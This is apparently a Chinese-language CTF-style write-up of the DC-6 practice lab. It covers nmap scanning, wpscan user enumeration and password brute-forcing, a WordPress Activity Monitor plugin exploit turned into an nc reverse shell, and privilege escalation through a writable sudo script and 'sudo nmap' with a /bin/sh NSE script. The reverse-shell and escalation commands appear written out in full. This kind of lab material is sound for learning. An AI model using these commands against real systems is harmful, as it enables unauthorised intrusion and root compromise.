渗透测试学习之靶机DC-6

前言

• 线索：
  

过程

1. 探测目标主机

nmap -sP 192.168.246.0/24，得到目标主机IP：192.168.246.143

2. 信息搜集

• 端口信息
  nmap -sV -p 1-65535 192.168.246.143
  
• web站点相关服务信息
  访问该IP的80端口，http://192.168.246.143:80
  
  页面跳转到了http://wordy，跟前面的DC-2一样，在C:\Windows\System32\drivers\etc的hosts文件中增加192.168.246.143 wordy，保存后重新访问
  
• 目录信息
  
• 枚举用户
  使用wpscan，wpscan --url http://wordy/ -e u：
  

3. 用户**

• 密码字典
  使用线索中的字典结合枚举出来的用户名进行**，来到/usr/share/wordlists目录下，看到rockyou的压缩文件，解压：
  gzip -d rockyou.txt.gz
  
  再使用线索中的命令筛选出含有k01的字典：
  cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
  
• 用户名字典
  将信息搜集中枚举出来的用户保存到/root/Desktop/user.txt文件中：
  
• **
  使用wpscan对之前的用户名密码字典进行**：
  wpscan --url http://wordy/ -P passwords.txt -U /root/Desktop/user.txt
  

4. 利用插件漏洞

看到大佬说wordpress漏洞很多都出现在插件上，刚好登录后发现用了

searchsploit activity monitor

查看详细信息，给出了PoC：

复制，修改ip端口，并改为nc请求连接后保存为.html文件后保存：

在138kali里监听8888端口，然后打开.html，点击Submit request按钮：

getshell：

python弹交互式shell：
python -c 'import pty;pty.spawn("/bin/bash")'

5. 提权

1. 来到home目录下，查看用户们，在jens中找到backups.sh、在mark中找到things-to-do.txt：
   
   
2. 使用txt文件中的新用户：
   切换su graham
   
3. 查看graham权限：
   sudo -l
   
   jens下的backups.sh免密执行，可以用来获取jens的操作权限：
   在backups.sh中插入nc 192.168.246.138 6666 -e /bin/bash，然后监听138的666端口，并使用sudo执行backups.sh，使其弹回jens权限的shell：
   echo 'nc 192.168.246.138 6666 -e /bin/bash' > backups.sh
   
   
4. python弹交互式shell：
   python -c 'import pty;pty.spawn("/bin/bash")'
   
5. 查看jens权限：
   sudo -l
   
6. nmap可以使用root权限免密执行，可用来获取root权限：sudo提权
   利用nmap能够执行脚本的功能，将/bin/sh写入到脚本中，令其执行，获取root权限：
   echo 'os.execute("/bin/sh")' > /tmp/xl.nse
sudo nmap --script=/tmp/xl.nse
   

6. 得到flag

进入/root目录下，得到theflag.txt

总结

• 难顶，好好学习，天天向上